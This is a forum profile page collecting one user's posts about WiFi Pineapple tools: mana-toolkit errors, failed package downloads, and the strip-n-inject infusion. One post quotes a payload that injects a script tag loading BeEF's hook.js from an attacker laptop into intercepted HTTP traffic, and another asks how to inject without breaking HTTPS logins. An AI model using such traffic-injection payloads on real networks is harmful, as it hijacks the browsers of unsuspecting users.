Jump to content

toan3000

Active Members
  • Posts

    14
  • Joined

  • Last visited

Everything posted by toan3000

  1. I found what's problem, we must use python2.6 instead python2.7. I don't know what's different, but now everything works! Thanks @i8igmac
  2. I tried apt-get install kali-linux-wireless and it didn't worked. I got same result. What's distro of linux you using on Rasp Pi? I try many time but it's not work.
  3. I had reinstalled mana-toolkit, but it have an error when run dns2proxy.py root@kali:/usr/share/mana-toolkit/sslstrip-hsts# python2.6 dns2proxy.py Traceback (most recent call last): File "dns2proxy.py", line 23, in <module> import pcapy ImportError: /usr/lib/python2.6/pcapy.so: cannot open shared object file: No such file or directory I check the directory /usr/lib/python2.6/, have pcapy.so already. I don't know what's wrong here. Anybody met same problem? Please let me know how to fix it. Thanks!
  4. Hi i8igmac, how can you make mana-toolkit works on raspberry? I've try many time and get errors. My raspberry run Kalilinux for arm. (I tested mana-toolkit on my laptop-kali1.09 and it's work!) Thanks!
  5. I like the new UI and new firmware's features, thanks for your hard work!
  6. everything is working again, i think "cloud.wifipineapple.com" was downed temporary yesterday.
  7. Hi bros, i have problem when install Strip-n-inject fusion after i upgrade my Mark V to 2.0.2. I don't know the host "cloud.wifipineapple.com" is down temporary or have something wrong with this firmware. This is my log when i try install this fusion: root@Pineapple:/sd/infusions/strip-n-inject/includes# ./install.sh No packages removed. Downloading http://cloud.wifipineapple.com/mk5/packages/Packages.gz. Updated list of available packages in /var/opkg-lists/pineapple_packages. Installing twisted-web (2.5.0-1) to root... Downloading http://cloud.wifipineapple.com/mk5/packages/twisted-web_2.5.0-1_ar71xx.ipk. wget: error getting response: Connection reset by peer Collected errors: * opkg_download: Failed to download http://cloud.wifipineapple.com/mk5/packages/twisted-web_2.5.0-1_ar71xx.ipk, wget returned 1. * opkg_install_pkg: Failed to download twisted-web. Perhaps you need to run 'opkg update'? * opkg_install_cmd: Cannot install package twisted-web.
  8. thanks, i have problems with strip&inject gui too, i'll try this
  9. I'm using mark 5 , installed strip&inject infusion already and it's works great. But how can i inject into http traffic only? I don't want to mess https, it make client can't login some page (gmail, twitter ...). Have any method so i can inject to http only and not touch to https traffic? Thank's you so much!
  10. Hi @leg3nd, i tried your infusion many time but never success inject hook.js in traffic thought my Pineapple. I config my Pineapple work as "client mode", my inject code is "<meta http-equiv="cache-control" content="no-cache" /><script src=\"http://172.16.42.3:3000/hook.js\" type=\"text/javascript\"></script>". My laptop is Kali Linux (172.16.42.3) running beef server. I ssh to pineapple (172.16.42.1) and run start.sh from "/pineapple/components/infusions/strip-n-inject/includes/". Everything seen ok, but when i test suff web througt pineapple, the html page not be injected, i check the source code of html respone and it not have hook.js. I don't know what's wrong? You can help me? Thanks alot!
×
×
  • Create New...